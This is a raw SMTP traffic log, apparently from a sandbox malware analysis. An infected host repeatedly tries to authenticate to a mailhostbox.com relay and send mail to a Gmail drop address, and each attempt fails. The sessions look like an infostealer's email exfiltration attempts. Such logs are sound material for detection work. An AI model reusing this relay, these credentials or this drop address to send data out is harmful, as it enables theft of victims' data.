                                                                          Sep 19, 2024 12:24:16.005532980 CEST61661587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:16.008725882 CEST58761659208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:16.008841991 CEST61659587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:16.162219048 CEST58761661208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:16.181294918 CEST58761659208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:17.693942070 CEST58761664208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:17.694117069 CEST61664587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:17.861510038 CEST58761664208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:17.861720085 CEST61664587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:18.023763895 CEST58761664208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:18.573834896 CEST58761665208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:18.574121952 CEST61665587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:18.738708019 CEST58761665208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:18.739427090 CEST61665587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:18.903228045 CEST58761665208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:20.471935987 CEST58761664208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:20.474725962 CEST61664587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:20.634368896 CEST58761664208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:20.634536982 CEST61664587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:20.813930035 CEST58761664208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:21.461950064 CEST58761668208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:21.462079048 CEST61668587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:21.623764038 CEST58761668208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:21.623915911 CEST61668587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:21.783379078 CEST58761668208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:22.305737019 CEST58761669208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:22.305890083 CEST61669587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:22.461276054 CEST58761669208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:22.462626934 CEST61669587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:22.620266914 CEST58761669208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:23.531234980 CEST58761668208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:23.531399012 CEST61668587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:23.696309090 CEST58761668208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:23.696528912 CEST61668587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:23.871824980 CEST58761668208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:24.467552900 CEST58761669208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:24.467880011 CEST61669587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:24.624241114 CEST58761669208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:24.628606081 CEST61669587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:24.802997112 CEST58761669208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:26.381696939 CEST58761674208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:26.387403965 CEST61674587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:26.542381048 CEST58761674208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:26.567413092 CEST61674587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:26.724931002 CEST58761674208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:26.762228012 CEST58761675208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:26.762525082 CEST61675587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:26.917865038 CEST58761675208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:26.921818972 CEST61675587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:27.080142021 CEST58761675208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:29.527757883 CEST58761675208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:29.527926922 CEST61675587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:29.683679104 CEST58761675208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:29.683917046 CEST61675587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:29.855340958 CEST58761675208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:30.073389053 CEST58761677208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:30.073538065 CEST61677587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:30.228236914 CEST58761677208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:30.231462955 CEST61677587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:30.388480902 CEST58761677208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:32.474282026 CEST58761677208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:32.474591970 CEST61677587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:32.581605911 CEST58761679208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:32.581764936 CEST61679587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:32.630568981 CEST58761677208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:32.630729914 CEST61677587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:32.738739967 CEST58761679208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:32.744388103 CEST61679587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:33.000521898 CEST58761677208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:33.000772953 CEST58761679208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:34.737231016 CEST58761682208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:34.742543936 CEST61682587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:35.088757038 CEST58761682208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:35.090626001 CEST61682587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:35.302448988 CEST58761682208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:35.456424952 CEST58761682208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:35.848872900 CEST58761683208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:35.848992109 CEST61683587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:36.002737045 CEST58761683208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:36.002895117 CEST61683587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:36.159444094 CEST58761683208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:37.476744890 CEST58761682208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:37.476919889 CEST61682587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:37.632280111 CEST58761682208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:37.632471085 CEST61682587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:37.812377930 CEST58761682208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:38.535079956 CEST58761683208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:38.536766052 CEST61683587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:38.692878008 CEST58761683208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:38.696254015 CEST61683587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:38.869651079 CEST58761683208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:39.483246088 CEST58761686208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:39.483376026 CEST61686587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:39.643723011 CEST58761686208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:39.643903971 CEST61686587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:39.806859016 CEST58761686208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:40.450320005 CEST58761687208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:40.451070070 CEST61687587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:41.378544092 CEST58761687208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:41.378725052 CEST61687587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:41.378796101 CEST58761687208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:41.378886938 CEST58761687208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:41.590683937 CEST58761687208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:41.590852022 CEST58761686208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:41.591013908 CEST61686587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:41.744832993 CEST58761687208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:41.755908966 CEST58761686208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:41.756076097 CEST61686587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:41.932982922 CEST58761686208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:43.401596069 CEST58761689208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:43.401722908 CEST61689587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:43.480572939 CEST58761687208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:43.480737925 CEST61687587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:43.557578087 CEST58761689208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:43.557754040 CEST61689587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:43.644473076 CEST58761687208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:43.644618988 CEST61687587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:43.715934992 CEST58761689208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:43.817184925 CEST58761687208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:45.160415888 CEST58761689208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:45.160558939 CEST61689587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:45.317660093 CEST58761689208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:45.317774057 CEST61689587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:45.445620060 CEST58761691208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:45.445759058 CEST61691587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:45.495868921 CEST58761689208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:45.600225925 CEST58761691208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:45.600421906 CEST61691587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:45.757788897 CEST58761691208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:47.972232103 CEST58761693208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:47.972393990 CEST61693587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:47.972524881 CEST58761691208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:47.972558022 CEST58761693208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:47.972666025 CEST61691587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:47.972788095 CEST58761691208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:47.972817898 CEST58761693208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:47.972866058 CEST58761691208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:47.972927094 CEST58761693208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:48.200428963 CEST61693587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:48.213720083 CEST58761691208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:48.365124941 CEST58761693208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:48.366162062 CEST58761691208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:48.367841959 CEST61691587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:48.367844105 CEST61693587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:48.525326014 CEST58761693208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:48.539376974 CEST58761691208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:50.041551113 CEST58761695208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:50.041910887 CEST61695587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:50.200952053 CEST58761695208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:50.208484888 CEST61695587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:50.371114016 CEST58761695208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:50.498954058 CEST58761693208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:50.504439116 CEST61693587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:50.665708065 CEST58761693208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:50.667659998 CEST61693587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:50.849482059 CEST58761693208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:52.164482117 CEST58761695208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:52.172657013 CEST61695587192.168.2.5208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                                                          Sep 19, 2024 12:24:52.331701040 CEST58761695208.91.198.143192.168.2.5250 2.1.0 Ok
                                                                          Sep 19, 2024 12:24:52.336474895 CEST61695587192.168.2.5208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                                                          Sep 19, 2024 12:24:52.392210007 CEST58761697208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:52.396445990 CEST61697587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:52.516465902 CEST58761695208.91.198.143192.168.2.5554 5.7.1 <favourcloning@gmail.com>: Relay access denied
                                                                          Sep 19, 2024 12:24:52.555414915 CEST58761697208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                                          250-PIPELINING
                                                                          250-SIZE 41648128
                                                                          250-VRFY
                                                                          250-ETRN
                                                                          250-STARTTLS
                                                                          250-AUTH PLAIN LOGIN
                                                                          250-AUTH=PLAIN LOGIN
                                                                          250-ENHANCEDSTATUSCODES
                                                                          250-8BITMIME
                                                                          250-DSN
                                                                          250 CHUNKING
                                                                          Sep 19, 2024 12:24:52.560436010 CEST61697587192.168.2.5208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                                                          Sep 19, 2024 12:24:52.720289946 CEST58761697208.91.198.143192.168.2.5334 UGFzc3dvcmQ6
                                                                          Sep 19, 2024 12:24:54.043314934 CEST58761699208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                          Sep 19, 2024 12:24:54.043555975 CEST61699587192.168.2.5208.91.198.143EHLO 965543
                                                                          Sep 19, 2024 12:24:54.163089037 CEST58761697208.91.198.143192.168.2.5535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
